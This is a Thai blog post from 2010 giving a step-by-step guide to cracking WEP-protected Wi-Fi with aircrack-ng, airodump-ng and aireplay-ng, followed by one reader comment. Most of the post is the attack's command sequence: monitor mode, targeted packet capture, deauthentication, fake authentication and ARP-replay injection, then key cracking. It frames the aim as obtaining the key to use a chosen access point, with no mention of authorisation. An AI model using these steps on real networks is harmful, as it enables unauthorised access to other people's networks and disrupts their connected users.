Pages

9/12/2010

วิธี hack wireless ที่ป้องกันด้วยระบบ WEP

หลังจากอ่านมาหลายที่  สุดท้ายโปรแกรมหลักๆ ที่ใช้ในการ จัดการกับเรื่องนี้ มีอยู่สี่ตัว คือ
airmon-ng, airodump-ng, aircrack-ng, aireplay-ng

โดยแต่ละตัว ทำหน้าที่คือ

  • airmon-ng       ทำการเปิดระบบให้wireless card เราอยู่ใน mode ที่ monitor traffic ได้
  • airodump-ng   ดักจับ packet ที่วิ่งอยู่ในอากาศ  โดยเราสามารถฟิลเตอร์ได้ว่าจะเอาเฉพาะที่มาจากwireless ตัวไหน ช่องไหน
  • aircrack-ng      รับข้อมูลที่ได้มาจากการ dump เพื่อมาแกะหา pass key ที่จะใช้ในการเข้าไปใช้ wireless
  • aireplay-ng      ไว้สำหรับเล่นกับตัวwireless access point เพื่อทำเร่งให้มี traffic เยอะๆ จะได้ดักจับ และแกะ pass key ได้ง่ายขึ้น


หลักการคร่าวๆ คือ

  1. เปิดระบบให้ wireless card ทำตัวแบบรับ traffic ได้
  2. หา และดักจับ traffic ในอากาศ เฉพาะตัว wireless APที่ต้องการเข้าใช้ และบันทึกลงไฟล์
  3. [Optional]  เพื่อความรวดเร็ว อาจจะใช้การจำลองส่งข้อมูลเข้าไปที่ wireless AP เพื่อสร้างให้เกิด traffic เพิ่มขึ้นมาได้  จะได้ดักจับได้จำนวนมากๆ
  4. นำไฟล์ที่เก็บ packet ต่างๆไว้ มา crack  เพื่อหา pass key ของ wireless AP ตัวนั้น


คำสั่งต่างๆ แบบเรียงลำดับการใช้งาน
(* wireless intf == ชื่ออุปกรณ์wireless เช่น  wlan0, mon0)
เปิดการใช้งาน Wireless Interface
airmon-ng           ; เพื่อเช็คว่า wireless interface ชื่ออะไร
airmon-ng stop [wireless intf]         ; หยุดการทำงานก่อน
airmon-ng start [wireless intf]        ; เริ่มการทำงานใหม่ ในโหมด monitor
[ ถ้าใช้ได้แล้ว  airmon-ng อีกครั้ง จะเห็นว่ามีิิอุปกรณ์wirelessใหม่ขึ้นมาชื่อ mon0 ซึ่งเราจะเอาไปใช้ต่อไป]

เริ่มค้นหาและดักจับข้อมูล
airodump-ng mon0       ; เช็คดูว่า มี wireless AP อะไรอยู่บ้าง
เลือก AP ที่ต้องการ โดยจำ channel, bssid ของมันไว้ แล้วกด Ctrl+C เพื่อหยุดคำสั่งนี้
airodump-ng -w wep -c [channel number] --bssid [bssid number]  mon0      ;เพื่อเริ่ม dump ข้อมูล traffic ที่วิ่งเข้า/วิ่งออก wireless AP ตัวนั้น แล้วเก็บไว้ในไฟล์    wep-**.cap 
ปล่อย airodump-ng รันไว้เรื่อยๆ ก่อน

[optional] กระตุ้นให้ traffic มากขึ้น
aireplay-ng -0 -a [bssid] -c [a client's mac] mon0   ;เพื่อหลอกว่าเราจะlogout แต่ความจริงแค่เอา ACK เท่านั้น (สามารถใช้เก็บค่า handshaking key ใน wpa ได้ด้วย)
aireplay-ng -1 0 -a [bssid] mon0     ;เพื่อปลอมว่าเราจะพยายาม login เข้าไปใช้wireless ตัวนี้ (fakeauth)
aireplay-ng -3 -b [bssid] mon0      ; เพื่อโจมตีด้วยการสร้าง Arp-request ไปเรื่อยๆเพื่อให้เกิดข้อมูลวิ่งเข้าวิ่งออก (arpreplay)
กด Ctrl+C เพื่อหยุดเมื่อได้จำนวนข้อมูลที่ดักจับได้ เป็นจำนวนที่พอใจแล้ว

แกะรหัสผ่าน
เมื่อได้ข้อมูลมามากพอสมควร  (บางที่บอก > 5000, บางที่บอก >30,000, แต่ยิ่งมากก็ยิ่งดี) โดยดูจากคำสั่ง airodump-ng ที่รันอยู่
จะพบว่า airodump-ng นั้นสร้าง ไฟล์ออกมา  (.cap)   ในที่นี้ไฟล์ต่างๆจะขึ้นต้นด้วย wep

ให้เรานำไฟล์แรกของชุดไฟล์นั้นเข้าไปในคำสั่ง  (ในที่นี้คือ wep-01.cap)
aircrack-ng  [filename]          ; เพื่อทำการ crack หา pass key ของ wireless AP นั้น  
เมื่อได้ pass key มาแล้ว เราก็จะเอาไปใช้ในการ login เพื่อใช้ในการ เข้าไปใช้ wireless AP นั้นต่อไป




VDO

1 comment:

  1. ขอบคุณครับผมลองทำตามจนถึง
    aireplay-ng 'เพิ่มData อะคับ
    มัน Read เป็นพันแล้ว แต่ไม่ยอม ส่ง Packet ไปอะ - -'
    (Access Point บ้านตัวเอง)
    เป็นเพราะอะไรหรอครับ

    ReplyDelete